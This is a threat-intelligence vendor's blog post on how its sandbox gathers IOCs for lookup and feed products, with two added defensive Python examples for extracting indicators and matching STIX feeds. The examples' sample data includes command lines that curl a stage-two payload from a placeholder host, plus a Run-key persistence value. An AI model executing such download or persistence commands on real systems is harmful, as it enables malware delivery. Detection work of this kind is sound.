How We Process IOCs for ANY.RUN Threat Intelligence Lookup and Feeds

At ANY.RUN, we’ve been developing our interactive online malware sandbox since 2016. Today, 400,000 security professionals use it to detonate files, analyze threats, and inspect phishing sites. 

This gives us a unique perspective — and our key advantage: we’ve built a database of event fields and IOCs that preserves the connections between all artifacts within a single analysis session. In October 2022, aiming to give our users a more powerful way to use this data, we launched Threat Intelligence (TI) Feeds, followed by the TI Lookup portal, which we shipped in February. 


In this article, we’ll explain how these products can help you expand threat coverage or identify threats from isolated indicators that no other security solution on the market may have access to. 

How ANY.RUN processes indicators 

Our sandbox is interactive. This means malware actually executes within it, running through its different stages: fetching payloads, encrypting files, or stealing data. If a sample doesn’t self-execute, the analyst can trigger it manually, for example by entering the password for a password-protected .ZIP archive or solving a CAPTCHA on a phishing site so that a second-stage payload is downloaded. 

This allows us to capture a holistic picture of indicators within each analysis session. We extract them from: 

  • Memory (memory dumps, static analysis) 
  • Traffic between the malware and C2 server 
  • MITRE ATT&CK tactics, techniques, and procedures 

In addition to indicators, we collect associated event fields such as Command Line, File Name, Registry Name, Registry Value, Injection Flags, HTTP Response Content, and Image Path, around 30 fields in total. 


Where our IOCs come from 

The IOCs you can receive through Feeds or search for in the Lookup portal come from public sandbox research sessions; the ANY.RUN sandbox receives around 14,000 of these daily, submitted by analysts from over 100 countries. Here’s how it works: 

Let’s say an analyst in the UK notices something suspicious in their SIEM logs or receives a request to inspect a strange email link. They upload the file to our sandbox and configure a regional network environment using a residential proxy. 

They then perform an interactive analysis session, allowing the sample to fully execute. We capture all processes and events, and extract hashes, domains, IPs, and URLs from the analysis task. Sessions can last up to 1,200 seconds as analysts conduct thorough investigations. 

This is how we obtain data on the latest malware threats from around the globe. In total, our threat database stores 24TB of such data. 
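As an added illustration of the extraction step described above (this is example code, not ANY.RUN’s own pipeline), the following Python script takes constructed sandbox-style event records, pulls hashes, domains, IPs and URLs out of their fields, and keeps the link back to the session and field where each indicator was seen, so that one indicator can be pivoted to every session that recorded it. The event layout, session ids and indicator values are assumptions made up for the example; the SHA-256 shown is the hash of empty input, used only as a placeholder.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: five event records from two hypothetical analysis
# sessions. Session ids, field names and values are assumptions chosen to
# resemble the event fields listed in the article, not real sandbox output.
# The SHA-256 is the hash of the empty input, used here as a placeholder.
SAMPLE_EVENTS = [
    {"session": "task-0001", "fields": {
        "Image Path": "C:\\Windows\\System32\\cmd.exe",
        "Command Line": "cmd.exe /c curl http://files.stage.example/stage2.bin "
                        "-o C:\\Users\\Public\\stage2.bin"}},
    {"session": "task-0001", "fields": {
        "File Name": "C:\\Users\\Public\\stage2.bin",
        "SHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}},
    {"session": "task-0001", "fields": {
        "Domain": "files.stage.example", "Destination IP": "203.0.113.45",
        "URL": "http://files.stage.example/stage2.bin"}},
    {"session": "task-0002", "fields": {
        "Registry Name": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        "Registry Value": "C:\\Users\\Public\\updater.exe"}},
    {"session": "task-0002", "fields": {
        "Domain": "FILES.stage.example", "Destination IP": "203.0.113.45",
        "URL": "https://files.stage.example/beacon?id=7"}},
]

# Regexes for the atomic indicator types. The \b anchors keep a 64-hex
# SHA-256 from also being reported as two 32-hex MD5 halves.
PATTERNS = [
    ("sha256", re.compile(r"\b[0-9a-fA-F]{64}\b")),
    ("md5", re.compile(r"\b[0-9a-fA-F]{32}\b")),
    ("url", re.compile(r"\bhttps?://[^\s\"'<>]+")),
    ("ipv4", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
]


def _valid_ipv4(text):
    return all(0 <= int(octet) <= 255 for octet in text.split("."))


def extract_iocs(events):
    """Map every IOC found in the events to its type, sessions and fields."""
    iocs = defaultdict(lambda: {"type": None, "sessions": set(), "fields": set()})

    def add(kind, value, session, field):
        key = value if kind == "url" else value.lower()   # URLs keep case (paths)
        entry = iocs[key]
        entry["type"] = kind
        entry["sessions"].add(session)
        entry["fields"].add(field)

    for event in events:
        for field, value in event["fields"].items():
            if not isinstance(value, str):
                continue
            for kind, pattern in PATTERNS:
                for match in pattern.finditer(value):
                    if kind == "ipv4" and not _valid_ipv4(match.group()):
                        continue
                    add(kind, match.group(), event["session"], field)
                    if kind == "url":      # a URL also yields its host as a domain
                        host = urlparse(match.group()).hostname
                        if host:
                            add("domain", host, event["session"], field)
            if field == "Domain":          # typed field, no regex needed
                add("domain", value, event["session"], field)
    return dict(iocs)


def sessions_sharing(iocs, value):
    """Pivot: which sessions recorded this indicator?"""
    key = value if value.startswith(("http://", "https://")) else value.lower()
    return sorted(iocs.get(key, {"sessions": set()})["sessions"])


def defang(value):
    """Make an indicator safe to paste into a report (hxxp://, [.])."""
    if value.startswith(("http://", "https://")):
        netloc = urlparse(value).netloc
        return value.replace(netloc, netloc.replace(".", "[.]"), 1).replace("http", "hxxp", 1)
    return value.replace(".", "[.]")


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_EVENTS)
    for ioc, info in sorted(found.items()):
        print(f"{info['type']:7} {defang(ioc):50} sessions={sorted(info['sessions'])}")
```

Running the script shows the domain and IP linked to both constructed sessions while the stage-two URL and hash belong only to the first; that cross-session linkage is the pivot the article describes, and `defang` is there because extracted indicators usually end up in a ticket or report.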

How to use ANY.RUN threat intelligence for your advantage 

You can leverage our data in two main ways: 

  1. In TI Lookup: Use our portal to search for related events across 30 parameters. Search for exact values, or use the wildcard (*) to match substrings. Our search is extremely fast, with results typically appearing within 5 seconds. You receive not only connected IOCs and event fields, but also links to the sandbox research sessions where they were recorded.  
  2. In TI Feeds: Pull the data in STIX format from our Feeds directly into your TIP and SIEM systems, then configure your firewalls against the latest threats. New data arrives every 2 hours, providing not just indicators but associated event fields for full context. 
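Both items above, pulling STIX indicators from a feed into a SIEM and searching event fields with a * wildcard, can be shown in one small Python example. This is an added illustration, not ANY.RUN code: the STIX 2.1 bundle, indicator ids and SIEM events are constructed, and nothing about the real feed’s layout is assumed beyond standard STIX indicator objects with single comparison patterns. It also includes the check a practitioner wants when consuming a feed that refreshes every 2 hours: indicators outside their valid_from / valid_until window are dropped rather than blocked on.

```python
import json
import re
from datetime import datetime, timezone
from fnmatch import fnmatchcase

# Constructed STIX 2.1 bundle standing in for a feed pull. The object ids,
# patterns, names and dates are assumptions for illustration; none come from
# the ANY.RUN feed.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-0000000000a1",
         "pattern": "[domain-name:value = 'files.stage.example']",
         "valid_from": "2024-01-01T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-0000000000a2",
         "pattern": "[ipv4-addr:value = '203.0.113.45']",
         "valid_from": "2024-01-01T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-0000000000a3",
         "pattern": "[url:value = 'http://files.stage.example/stage2.bin']",
         "valid_from": "2024-01-01T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1", "pattern_type": "stix",
         "id": "indicator--00000000-0000-4000-8000-0000000000a4",
         "pattern": "[url:value = 'http://old.stage.example/x']",
         "valid_from": "2023-01-01T00:00:00Z",
         "valid_until": "2023-06-01T00:00:00Z"},        # expired indicator
        {"type": "malware", "spec_version": "2.1",
         "id": "malware--00000000-0000-4000-8000-0000000000b1",
         "name": "ExampleLoader", "is_family": True},   # not an indicator: ignored
    ],
})

# Constructed proxy/EDR events in the shape a SIEM might hold; ids are made up.
SAMPLE_EVENTS = [
    {"id": "ev-1", "host": "files.stage.example", "dst_ip": "203.0.113.45",
     "url": "http://files.stage.example/stage2.bin",
     "cmdline": "cmd.exe /c curl http://files.stage.example/stage2.bin -o stage2.bin"},
    {"id": "ev-2", "host": "intranet.corp.example", "dst_ip": "198.51.100.7",
     "url": "https://intranet.corp.example/", "cmdline": "chrome.exe --profile-directory=Default"},
    {"id": "ev-3", "host": "old.stage.example", "dst_ip": "203.0.113.9",
     "url": "http://old.stage.example/x", "cmdline": "curl http://old.stage.example/x"},
]

NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)   # fixed "current time" for the example

# One comparison expression, the form IOC feeds usually emit. Compound STIX
# patterns (AND/OR, REPEATS, WITHIN) would need a real pattern parser.
PATTERN_RE = re.compile(r"\[([^\s=]+)\s*=\s*'([^']*)'\]")
TYPE_MAP = {"domain-name:value": "domain", "ipv4-addr:value": "ip",
            "url:value": "url", "file:hashes.'SHA-256'": "sha256"}


def _stix_time(text):
    return datetime.fromisoformat(text.replace("Z", "+00:00"))


def parse_feed(bundle_json, now):
    """Return {kind: {value: indicator_id}} for indicators valid at `now`."""
    active = {kind: {} for kind in TYPE_MAP.values()}
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        if _stix_time(obj["valid_from"]) > now:
            continue                                  # not yet valid
        if "valid_until" in obj and _stix_time(obj["valid_until"]) <= now:
            continue                                  # expired: do not block on it
        for path, value in PATTERN_RE.findall(obj["pattern"]):
            kind = TYPE_MAP.get(path)
            if kind:
                active[kind][value if kind == "url" else value.lower()] = obj["id"]
    return active


EVENT_FIELDS = (("host", "domain"), ("dst_ip", "ip"), ("url", "url"))


def match_events(events, active):
    """Return (event_id, field, value, indicator_id) for every feed hit."""
    hits = []
    for event in events:
        for field, kind in EVENT_FIELDS:
            value = event.get(field)
            if value is None:
                continue
            indicator_id = active[kind].get(value if kind == "url" else value.lower())
            if indicator_id:
                hits.append((event["id"], field, value, indicator_id))
    return hits


def wildcard_search(events, field, pattern):
    """Lookup-style search over one event field; `*` matches any run of characters."""
    return [event["id"] for event in events if fnmatchcase(str(event.get(field, "")), pattern)]


if __name__ == "__main__":
    active = parse_feed(SAMPLE_BUNDLE, NOW)
    for hit in match_events(SAMPLE_EVENTS, active):
        print("feed hit:", hit)
    print("cmdline contains curl:", wildcard_search(SAMPLE_EVENTS, "cmdline", "*curl*"))
```

With the constructed data, only `ev-1` produces feed hits (domain, IP and URL each resolve to a different indicator id, which is what you want to carry into the alert), while `ev-3` is silent because its indicator has passed `valid_until`. The wildcard search runs over a single field and so mirrors the `*` substring search the portal offers; a TIP would normally handle compound STIX patterns and de-duplication across feed pulls, which this example leaves out.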

In addition, we have our own team of analysts who proactively research threats, conduct investigations, and add new detections.

Wrapping up 

By integrating our TI Feeds and Lookup portal, you’ll gain access to a continuously updated database of malware intelligence before it hits other sources. Leverage data from over 1.5 million interactive research sessions — from our community and an in-house team of analysts — to strengthen your security posture. 

Integrate our solutions to: 

  • Gain access to the latest malware data, which reaches us first from the community and our in-house analyst team. 
  • Search across any event field from 1.5 million interactive investigations over the past 6 months. 
  • Identify threats not just by IOCs, but by their actions within systems: command lines, registry modifications, memory dumps, unencrypted and encrypted traffic, and more. 

What is ANY.RUN? 

ANY.RUN’s most well-known product is an interactive malware sandbox that helps security teams analyze malware quickly and efficiently. Every day, 400,000 professionals use our platform to investigate incidents and streamline threat analysis on Windows and Linux VMs in the cloud.   


We’re well known for: 

  • Real-time detection: Within roughly 40 seconds of uploading a file, ANY.RUN can detect malware and automatically identify many malware families using YARA and Suricata rules. 
  • Interactive analysis: Unlike many automated solutions, ANY.RUN allows you to interactively engage with the virtual machine directly through your browser. This interactive capability helps prevent zero-day exploits and sophisticated malware that can evade signature-based detection. 
  • Cost-efficiency: For businesses, ANY.RUN’s cloud nature translates into a cost-effective solution, as it doesn’t require any setup or maintenance effort from your DevOps team. 
  • Helping with onboarding new security team members: ANY.RUN’s intuitive interface allows even junior SOC analysts to quickly learn how to analyze malware and extract indicators of compromise (IOCs). 

If these capabilities sound beneficial for you or your team, give ANY.RUN a try. The best part: we offer a completely free starter plan. 


The post How We Process IOCs for ANY.RUN Threat Intelligence Lookup and Feeds appeared first on ANY.RUN's Cybersecurity Blog.

Article Link: https://any.run/cybersecurity-blog/how-we-process-iocs/